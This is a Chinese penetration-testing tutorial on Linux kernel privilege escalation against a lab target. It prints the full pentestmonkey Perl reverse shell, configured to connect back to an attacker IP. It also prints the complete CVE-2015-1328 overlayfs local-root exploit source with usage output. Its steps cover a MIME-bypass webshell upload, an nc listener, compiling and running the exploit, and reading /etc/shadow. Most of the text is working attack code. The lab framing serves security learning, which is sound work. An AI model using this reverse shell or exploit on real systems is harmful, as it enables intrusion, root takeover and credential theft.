103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
文章目录
- 一、LINUX 内核漏洞提权
- 1、漏洞背景:
- 2、漏洞利用:
- (1)实验环境
- (2)靶机链接
- (3)突破MIME类型限制文件上传获取webshell
- (4)创建交互式shell
- (5)查看linux发行版
- (6)查找可用的提权exp
- (7)进行提权
- (8)切换shell
一、LINUX 内核漏洞提权
1、漏洞背景:
通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果想进行内网渗透就必须将权限提权到最高,如系统权限、超级管理员权限。
2、漏洞利用:
(1)实验环境
1.靶机环境:
(1)虚拟机Ubuntu 15.5.04【www.moontester.com】
(2)脚本语言环境:perl/python/php均存在
(3)内核版本:3.19.0-15-generic2.攻击主机:
(1)虚拟机Win7【192.168.97.130】
(2)Firefox+Burpsuite+蚁剑+nc瑞士军刀3.网络环境:
(1)VMware搭建的NAT网络
(2)靶机链接
URL:http://www.moontester.com/upload.php
(3)突破MIME类型限制文件上传获取webshell
第一步: 通过文件上传漏洞获取靶机的webshell
如下图所示,访问文件上传漏洞页面http://www.moontester.com/upload.php,然后BurpSuite抓包改包修改Content-Type文件类型突破文件上传限制从而上传一句话木马:
第二步: 蚁剑连接webshell
如下图所示,我们打开蚁剑,然后连接刚刚上传到靶机上的webshell:
(4)创建交互式shell
第一步: linux 提权的前提需要交互式shell
,可以使用工具perl-reverse-shell.pl
建立sockets
,那么如何建立sockets呢?(sockets是接口、插口的意思,这里我们一般引申为一条TCP连接的隧道
)
如下所示,perl-reverse-shell.pl脚本,脚本内有建立sockets的说明
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. The author accepts no liability
# for damage caused by this tool. If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";# Where to send the reverse shell. Change these.
# reverse是反向的意思,这里的方向定义的规则是:
# 攻击者对靶机的攻击是正向,靶机向攻击者发送请求是反向
my $ip = '192.168.97.130'; # 向攻击者的ip发送连接请求
my $port = 12345; # 向攻击者的ip的某端口发送连接请求
# 攻击者需要他提前开启侦听12345端口,也就是使用瑞士军刀命令工具:nc -lvvp 12345# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";# Change the process name to be less conspicious
$0 = "[httpd]";# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");if ($auth) {unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {cgiprint("ERROR: Your client isn't authorised to view this page");cgiexit();}}
} elsif ($auth) {cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");cgiexit(0);
}# Background and dissociate from parent process if required
if ($daemon) {my $pid = fork();if ($pid) {cgiexit(0); # parent exits}setsid();chdir('/');umask(0);
}# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {cgiprint("Sent reverse shell to $ip:$port");cgiprintpage();
} else {cgiprint("Couldn't open reverse shell to $ip:$port: $!");cgiexit();
}# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));# Wrapper around print
sub cgiprint {my $line = shift;$line .= "<p>\n";$global_page .= $line;
}# Wrapper around exit
sub cgiexit {cgiprintpage();exit 0; # 0 to ensure we don't give a 500 response.
}# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}
第二步: 修改perl-reverse-shell.pl脚本中的IP和端口后,通过蚁剑上传到upload目录下
如下图所示,根据攻击者IP我们修改的脚本:
如下图所示,我们成功上传脚本到靶机的upload目录下
第三步: 通过蚁剑打开webshell的虚拟终端,使用命令chmod +x perl-reverse-shell.php
给我们上传的脚本工具赋予可执行权限
如下图所示,成功赋予脚本工具可执行权限
第四步: 在攻击者本地使用nc瑞士军刀,监听脚本对应的端口12345
如下图所示,使用命令nc -lvvp 12345
监听端口:
第五步: 在蚁剑的虚拟终端里面,执行perl-reverse-shell.pl脚本,反弹Shell到攻击者的12345端口
如下图所示,在蚁剑的虚拟终端里面使用./perl-reverse-shell.pl脚本反弹shell到攻击者的12345端口:
(5)查看linux发行版
查看linux操作系统版本:cat /etc/issue
查看linux操作系统版本:cat /etc/*release
查看内核版本:uname -a
(6)查找可用的提权exp
第一步: 访问exp合集网站https://www.exploit-db.com/
,搜索3.19对应的漏洞exp
如下图所示,成功发现了exp:
第二步: 访问漏洞exphttps://www.exploit-db.com/exploits/37292
,复制下来,保存为exp.c
文件
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNTuser@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"static char child_stack[1024*1024];static int
child_exec(void *stuff)
{char *file;system("rm -rf /tmp/ns_sploit");mkdir("/tmp/ns_sploit", 0777);mkdir("/tmp/ns_sploit/work", 0777);mkdir("/tmp/ns_sploit/upper",0777);mkdir("/tmp/ns_sploit/o",0777);fprintf(stderr,"mount #1\n");if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lowerif (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");exit(-1);}file = ".access";chmod("/tmp/ns_sploit/work/work",0777);} else file = "ns_last_pid";chdir("/tmp/ns_sploit/o");rename(file,"ld.so.preload");chdir("/");umount("/tmp/ns_sploit/o");fprintf(stderr,"mount #2\n");if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {exit(-1);}chmod("/tmp/ns_sploit/work/work",0777);}chmod("/tmp/ns_sploit/o/ld.so.preload",0777);umount("/tmp/ns_sploit/o");
}int
main(int argc, char **argv)
{int status, fd, lib;pid_t wrapper, init;int clone_flags = CLONE_NEWNS | SIGCHLD;fprintf(stderr,"spawning threads\n");if((wrapper = fork()) == 0) {if(unshare(CLONE_NEWUSER) != 0)fprintf(stderr, "failed to create new user namespace\n");if((init = fork()) == 0) {pid_t pid =clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);if(pid < 0) {fprintf(stderr, "failed to create new mount namespace\n");exit(-1);}waitpid(pid, &status, 0);}waitpid(init, &status, 0);return 0;}usleep(300000);wait(NULL);fprintf(stderr,"child threads done\n");fd = open("/etc/ld.so.preload",O_WRONLY);if(fd == -1) {fprintf(stderr,"exploit failed\n");exit(-1);}fprintf(stderr,"/etc/ld.so.preload created\n");fprintf(stderr,"creating shared library\n");lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);write(lib,LIB,strlen(LIB));close(lib);lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");if(lib != 0) {fprintf(stderr,"couldn't create dynamic library\n");exit(-1);}write(fd,"/tmp/ofs-lib.so\n",16);close(fd);system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");execl("/bin/su","su",NULL);
}
(7)进行提权
以上的exp脚本内存在提权的姿势,如下所示:
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNTuser@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
第一步: 上传exp.c在靶机上,并且进行编译后执行,从而提权到root,如果编译不成功在本地编译后再上传的目标上。
如下图所示,使用蚁剑成功上传exp.c到靶机的upload目录下:
如下图所示,在蚁剑上使用命令gcc exp.c -o exp
成功的编译exp.c为exp可执行文件:
如下图所示,因为蚁剑不能执行这些exp,所以在我们通过nc建立的sockets上使用命令./exp
运行exp文件,从而提升权限到root
(8)切换shell
第一步: 执行命令python -c 'import pty; pty.spawn("/bin/bash")'
切换为更加高级的交互式shell
第二步: cat /etc/shadow
密文文件
103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]相关推荐
- 118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块提权审计工具]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.MSF 结合漏洞审计工具进行提权 1.MSF漏洞审计模块:local_exploit_suggeste 2. ...
- 112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权msf本地提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LPK.DDL劫持提权 1.sethc.exe是什么: 2.lpk.dll出现的背景: 3.Windows查 ...
- 113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 1.mof提权原理: 2.mof提权限制: 3.mof提权过程: (1)实验环境: (2)靶机链接: (3)实验 ...
- 操作系统权限提升(十五)之绕过UAC提权-基于白名单DLL劫持绕过UAC提权
系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权 操作系统权限提升(十四)之绕过UAC提权-基于白名 ...
- 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述
系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 操作系统权限提升(三)之Windows系统内核溢出漏洞提权 操作系统权限提升(四)之系统错误配置-Tus ...
- 【权限提升】61 Redis Postgresql数据库提权
目录 redis数据库权限提升 Redis未授权访问漏洞利用 1. 利用计划任务执行命令反弹shell 2. 写ssh-keygen公钥后 使用私钥登录 3. 往web路径写webshell 修复方案 ...
- 有哪些信息安全/网络安全/渗透测试/众测/CTF/红蓝攻防/漏洞测试等前沿技术/研究/技巧获取渠道?
前言 护网的定义是以国家组织组织事业单位.国企单位.名企单位等开展攻防两方的网络安全演习.进攻方一个月内采取不限方式对防守方展开进攻,不管任何手段只要攻破防守方的网络并且留下标记即成功,直接冲到防守 ...
- Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
目录 权限分类 针对环境 webshell权限 本地用户权限 提权方法 1.windows内核溢出漏洞(如何判断类型和利用) 2.数据库提权 Mysql Mssql oracle redis post ...
- 74.网络安全渗透测试—[SQL注入篇13]—[SQLSERVER+ASP-执行系统命令]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.SQLSERVER+ASP 执行系统命令 1.前言 2.SQLSERVER+ASP 执行系统命令示例 一.S ...
最新文章
- post提交返回json格式
- hdu1530 最大团简单题目
- 简单的busybox创建_用Busybox创建文件系统
- DBSAN密度聚类算法
- C++中char*与wchar_t*之间的转换
- 杜教BM模板(用于求线性递推公式第N项)
- mysql 大于号 优化_SQL优化 MySQL版 - 避免索引失效原则(二)
- 固定 顶部_纹络型温室大棚顶部通风样式及效率对比
- 阿里云产品头条(2018年1月刊)
- 【深度学习系列】用PaddlePaddle和Tensorflow实现GoogLeNet InceptionV2/V3/V4
- python调用rocketmq的api_rocketmq-python
- macos 判断走无线网还是有线网_“第一次约会,就想发生关系”:怎样判断男人对你走心还是走肾?...
- ai 实用新型专利_专利制度协调AI创造的创新
- Linux实现倒计时显示时分QT,qt实现倒计时示例
- python 通达信公式函数,python使用通达信公式,请人用python编写如下公式,我对编程一窍不通...
- JESD204B调试笔记(实用版)
- 中文搜索引擎2010Q2市场份额
- r语言 柱状图加星号_R语言-柱状图
- windows 调试若干知识
- 手机比较版本差异工具